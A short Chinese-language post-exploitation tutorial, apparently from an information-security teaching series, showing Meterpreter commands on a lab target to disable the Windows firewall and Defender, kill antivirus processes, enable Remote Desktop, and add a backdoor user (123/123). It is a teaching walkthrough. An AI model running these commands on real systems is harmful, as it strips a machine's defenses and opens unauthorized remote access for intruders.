要system權限
關閉防火牆
netsh advfirewall set allprofiles state off
關閉denfender
輸入shell 進入 cmdshell裡面
net stop windefend
關閉成功
run killav //關閉殺毒軟件
使用後滲透模塊 關閉殺軟
run post/windows/manage/killav
我靶機上是啟動了360的 腳本探測不到360的存在,顯示沒有殺軟進程
遠程桌面登錄
run post/windows/manage/enable_rdp
再來到靶機看看
遠程桌面已經開啟
也可以使用getgui 來開啟 遠程桌面
Run getgui -e
添加用戶
run getgui -u 123 -p 123
然後就可以再kali裡面七檔rdesktop開啟遠程桌面連接了
閱讀更多 信息安全教學 的文章